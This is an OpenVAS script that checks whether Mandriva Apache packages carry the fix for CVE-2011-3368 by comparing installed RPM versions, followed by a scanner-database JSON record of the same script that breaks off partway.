Mandriva Update for apache MDVSA-2011:144 (apache)
2011-10-10T00:00:00
ID OPENVAS:831460 Type openvas Reporter Copyright (c) 2011 Greenbone Networks GmbH Modified 2017-07-06T00:00:00
Description
Checks the version of the installed apache packages.
###############################################################################
# OpenVAS Vulnerability Test
#
# Mandriva Update for apache MDVSA-2011:144 (apache)
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Advisory text for MDVSA-2011:144. These three strings are only attached to
# the script's metadata in the description block; the detection logic never
# reads them.
# NOTE(review): nothing in the visible script calls a revisions-lib function
# directly; presumably pkg-lib-rpm.inc relies on it - confirm before removing.
include("revisions-lib.inc");
# Scope note for triage: CVE-2011-3368 concerns reverse-proxy setups that use
# RewriteRule or ProxyPassMatch patterns. This script only compares installed
# RPM versions and never inspects the httpd configuration, so a finding means
# "vendor fix not installed", not "the affected proxy patterns are in use".
tag_insight = "A vulnerability has been discovered and corrected in apache:
The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,
2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly
interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern
matches for configuration of a reverse proxy, which allows remote
attackers to send requests to intranet servers via a malformed URI
containing an initial \@ (at sign) character (CVE-2011-3368).
Packages for 2009.0 are provided as of the Extended Maintenance
Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490
The updated packages have been patched to correct this issue.";
# Remediation shown to the user: install the vendor's updated packages.
tag_solution = "Please Install the Updated Packages.";
# Products listed as affected by the advisory; the release keys actually
# tested further down are MNDK_mes5, MNDK_2010.1 and MNDK_2009.0.
tag_affected = "apache on Mandriva Linux 2009.0,
Mandriva Linux 2009.0/X86_64,
Mandriva Linux 2010.1,
Mandriva Linux 2010.1/X86_64,
Mandriva Enterprise Server 5,
Mandriva Enterprise Server 5/X86_64";
# Metadata registration. When the scanner loads the script with `description`
# set, this block records the script's identity, scoring and scheduling
# information and exits before any check is run.
if(description)
{
# Reference to the vendor announcement for this advisory.
script_xref(name : "URL" , value : "http://lists.mandriva.com/security-announce/2011-10/msg00017.php");
script_id(831460);
script_version("$Revision: 6570 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $");
script_tag(name:"creation_date", value:"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)");
# Base score 5.0 with a vector of network access, no authentication and
# partial confidentiality impact only.
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_xref(name: "MDVSA", value: "2011:144");
script_cve_id("CVE-2011-3368");
script_name("Mandriva Update for apache MDVSA-2011:144 (apache)");
script_summary("Check for the Version of apache");
# Information-gathering category: the check reads package data and sends
# nothing to the Apache service itself.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
script_family("Mandrake Local Security Checks");
# The check depends on gather-package-list.nasl and on the two ssh/login/*
# knowledge-base keys below, i.e. on an authenticated scan of the host.
# Presumably the scanner skips this script when the keys are absent - confirm
# against the scanner's handling of mandatory keys.
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/mandriva_mandrake_linux", "ssh/login/release");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
# The result rests on package-version evidence ("package") and the fix is a
# vendor update ("VendorFix").
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
# Registration only: stop here so that no check logic runs in this mode.
exit(0);
}
# Check phase. pkg-lib-rpm.inc supplies isrpmvuln() and the __pkg_match flag
# used by the per-release sections below.
include("pkg-lib-rpm.inc");

# Holds the report text returned by isrpmvuln() for a flagged package.
res = "";

# Release key stored in the knowledge base under ssh/login/release. Without
# it there is nothing to compare against, so the script ends without a
# verdict.
release = get_kb_item("ssh/login/release");
if (release == NULL)
  exit(0);
# Mandriva Enterprise Server 5: compare every apache sub-package against the
# fixed build 2.2.9-12.13mdvmes5.2 from MDVSA-2011:144.
if (release == "MNDK_mes5")
{
  # Version/release suffix appended to each package name to form the "rpm"
  # argument, e.g. "apache-base~2.2.9~12.13mdvmes5.2".
  mes5_fixed_suffix = "~2.2.9~12.13mdvmes5.2";

  # Packages are tested in this order; the first one flagged ends the script.
  mes5_pkgs = make_list(
    "apache-base",
    "apache-devel",
    "apache-htcacheclean",
    "apache-mod_authn_dbd",
    "apache-mod_cache",
    "apache-mod_dav",
    "apache-mod_dbd",
    "apache-mod_deflate",
    "apache-mod_disk_cache",
    "apache-mod_file_cache",
    "apache-mod_ldap",
    "apache-mod_mem_cache",
    "apache-mod_proxy",
    "apache-mod_proxy_ajp",
    "apache-mod_ssl",
    "apache-modules",
    "apache-mod_userdir",
    "apache-mpm-event",
    "apache-mpm-itk",
    "apache-mpm-peruser",
    "apache-mpm-prefork",
    "apache-mpm-worker",
    "apache-source",
    "apache"
  );

  foreach mes5_pkg (mes5_pkgs)
  {
    # isrpmvuln() comes from pkg-lib-rpm.inc (not shown here); a non-NULL
    # result is treated as the report text for a vulnerable package.
    res = isrpmvuln(pkg:mes5_pkg, rpm:mes5_pkg + mes5_fixed_suffix, rls:"MNDK_mes5");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Nothing was flagged. Exit code 99 reports "not vulnerable" when
  # __pkg_match is set (presumably by isrpmvuln() on finding a listed
  # package installed - confirm in pkg-lib-rpm.inc); otherwise end silently.
  if (__pkg_match) exit(99); # Not vulnerable.
  exit(0);
}
# Mandriva Linux 2010.1: compare every apache sub-package against the fixed
# build 2.2.15-3.4mdv2010.2 from MDVSA-2011:144. The release key is
# MNDK_2010.1 while the package build tag reads mdv2010.2, as given in the
# advisory data.
if (release == "MNDK_2010.1")
{
  # Version/release suffix appended to each package name to form the "rpm"
  # argument, e.g. "apache-base~2.2.15~3.4mdv2010.2".
  mdv2010_fixed_suffix = "~2.2.15~3.4mdv2010.2";

  # Packages are tested in this order; the first one flagged ends the script.
  # This release also ships apache-mod_proxy_scgi and apache-mod_reqtimeout.
  mdv2010_pkgs = make_list(
    "apache-base",
    "apache-devel",
    "apache-htcacheclean",
    "apache-mod_authn_dbd",
    "apache-mod_cache",
    "apache-mod_dav",
    "apache-mod_dbd",
    "apache-mod_deflate",
    "apache-mod_disk_cache",
    "apache-mod_file_cache",
    "apache-mod_ldap",
    "apache-mod_mem_cache",
    "apache-mod_proxy",
    "apache-mod_proxy_ajp",
    "apache-mod_proxy_scgi",
    "apache-mod_reqtimeout",
    "apache-mod_ssl",
    "apache-modules",
    "apache-mod_userdir",
    "apache-mpm-event",
    "apache-mpm-itk",
    "apache-mpm-peruser",
    "apache-mpm-prefork",
    "apache-mpm-worker",
    "apache-source",
    "apache"
  );

  foreach mdv2010_pkg (mdv2010_pkgs)
  {
    # isrpmvuln() comes from pkg-lib-rpm.inc (not shown here); a non-NULL
    # result is treated as the report text for a vulnerable package.
    res = isrpmvuln(pkg:mdv2010_pkg, rpm:mdv2010_pkg + mdv2010_fixed_suffix, rls:"MNDK_2010.1");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Nothing was flagged. Exit code 99 reports "not vulnerable" when
  # __pkg_match is set (presumably by isrpmvuln() on finding a listed
  # package installed - confirm in pkg-lib-rpm.inc); otherwise end silently.
  if (__pkg_match) exit(99); # Not vulnerable.
  exit(0);
}
# Mandriva Linux 2009.0: compare every apache sub-package against the fixed
# build 2.2.9-12.13mdv2009.0 from MDVSA-2011:144.
if (release == "MNDK_2009.0")
{
  # Version/release suffix appended to each package name to form the "rpm"
  # argument, e.g. "apache-base~2.2.9~12.13mdv2009.0".
  mdv2009_fixed_suffix = "~2.2.9~12.13mdv2009.0";

  # Packages are tested in this order; the first one flagged ends the script.
  mdv2009_pkgs = make_list(
    "apache-base",
    "apache-devel",
    "apache-htcacheclean",
    "apache-mod_authn_dbd",
    "apache-mod_cache",
    "apache-mod_dav",
    "apache-mod_dbd",
    "apache-mod_deflate",
    "apache-mod_disk_cache",
    "apache-mod_file_cache",
    "apache-mod_ldap",
    "apache-mod_mem_cache",
    "apache-mod_proxy",
    "apache-mod_proxy_ajp",
    "apache-mod_ssl",
    "apache-modules",
    "apache-mod_userdir",
    "apache-mpm-event",
    "apache-mpm-itk",
    "apache-mpm-peruser",
    "apache-mpm-prefork",
    "apache-mpm-worker",
    "apache-source",
    "apache"
  );

  foreach mdv2009_pkg (mdv2009_pkgs)
  {
    # isrpmvuln() comes from pkg-lib-rpm.inc (not shown here); a non-NULL
    # result is treated as the report text for a vulnerable package.
    res = isrpmvuln(pkg:mdv2009_pkg, rpm:mdv2009_pkg + mdv2009_fixed_suffix, rls:"MNDK_2009.0");
    if (res != NULL)
    {
      security_message(data:res);
      exit(0);
    }
  }

  # Nothing was flagged. Exit code 99 reports "not vulnerable" when
  # __pkg_match is set (presumably by isrpmvuln() on finding a listed
  # package installed - confirm in pkg-lib-rpm.inc); otherwise end silently.
  if (__pkg_match) exit(99); # Not vulnerable.
  exit(0);
}
{"id": "OPENVAS:831460", "type": "openvas", "bulletinFamily": "scanner", "title": "Mandriva Update for apache MDVSA-2011:144 (apache)", "description": "Check for the Version of apache", "published": "2011-10-10T00:00:00", "modified": "2017-07-06T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=831460", "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "references": ["http://lists.mandriva.com/security-announce/2011-10/msg00017.php", "2011:144"], "cvelist": ["CVE-2011-3368"], "lastseen": "2017-07-24T12:55:21", "viewCount": 3, "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-07-24T12:55:21", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-3368"]}, {"type": "f5", "idList": ["SOL15889", "F5:K15889", "F5:K20979231"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1391", "ELSA-2011-1392"]}, {"type": "freebsd", "idList": ["4B7DBFAB-4C6B-11E1-BC16-0023AE8E59F0", "D8C901FF-0F0F-11E1-902B-20CF30E32F6D"]}, {"type": "threatpost", "idList": ["THREATPOST:0413CB7CEB3A83FB6F02DBDDD013A75E"]}, {"type": "openvas", "idList": ["OPENVAS:870505", "OPENVAS:136141256231070600", "OPENVAS:1361412562310881032", "OPENVAS:1361412562310831460", "OPENVAS:881032", "OPENVAS:1361412562310120513", "OPENVAS:1361412562310122067", "OPENVAS:70600", "OPENVAS:881020", "OPENVAS:1361412562310881020"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_D8C901FF0F0F11E1902B20CF30E32F6D.NASL", "CENTOS_RHSA-2011-1392.NASL", "ALA_ALAS-2011-9.NASL", "MANDRIVA_MDVSA-2011-144.NASL", "REDHAT-RHSA-2011-1392.NASL", "ORACLELINUX_ELSA-2011-1392.NASL", "APACHE_MOD_PROXY_INFO_LEAK2.NASL", "APACHE_MOD_PROXY_INFO_LEAK.NASL", "SL_20111020_HTTPD_ON_SL4_X.NASL", "ALA_ALAS-2011-09.NASL"]}, {"type": "httpd", "idList": ["HTTPD:F7A5E015190D03DEDD087C99CEE5A140", "HTTPD:428F24190DE7AFCBC94D3836B96A0602", "HTTPD:AA5F8228C297859EE599A23F56BA394E", 
"HTTPD:5CBB2FE29DAB23F81203059931DCD49C"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27148", "SECURITYVULNS:DOC:27611", "SECURITYVULNS:VULN:12166", "SECURITYVULNS:VULN:11968"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/REWRITE_PROXY_BYPASS"]}, {"type": "exploitdb", "idList": ["EDB-ID:17969"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:460143F0ACAE117DD79BD75EDFDA154B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:105591", "PACKETSTORM:105672"]}, {"type": "seebug", "idList": ["SSV:20993", "SSV:20979", "SSV:20969"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2011-3368.NSE"]}, {"type": "amazon", "idList": ["ALAS-2011-009", "ALAS-2012-046"]}, {"type": "redhat", "idList": ["RHSA-2011:1391", "RHSA-2012:0128", "RHSA-2012:0323", "RHSA-2011:1392"]}, {"type": "centos", "idList": ["CESA-2012:0128", "CESA-2011:1392"]}, {"type": "suse", "idList": ["SUSE-SU-2011:1215-1", "SUSE-SU-2011:1229-1", "OPENSUSE-SU-2011:1217-1"]}, {"type": "ubuntu", "idList": ["USN-1259-1"]}, {"type": "fedora", "idList": ["FEDORA:E95B521B26", "FEDORA:4529E211C9"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2405-1:AE657"]}, {"type": "slackware", "idList": ["SSA-2012-041-01"]}], "modified": "2017-07-24T12:55:21", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "831460", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for apache MDVSA-2011:144 (apache)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been discovered and corrected in apache:\n\n The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\n interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern\n matches for configuration of a reverse proxy, which allows remote\n attackers to send requests to intranet servers via a malformed URI\n containing an initial \\@ (at sign) character (CVE-2011-3368).\n \n Packages for 2009.0 are provided as of the Extended Maintenance\n Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&products_id=490\n \n The updated packages have been patched to correct this issue.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"apache on Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-10/msg00017.php\");\n script_id(831460);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: 
\"2011:144\");\n script_cve_id(\"CVE-2011-3368\");\n script_name(\"Mandriva Update for apache MDVSA-2011:144 (apache)\");\n\n script_summary(\"Check for the Version of apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 
((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.15~3.4mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", rpm:\"apache-mod_dbd~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != 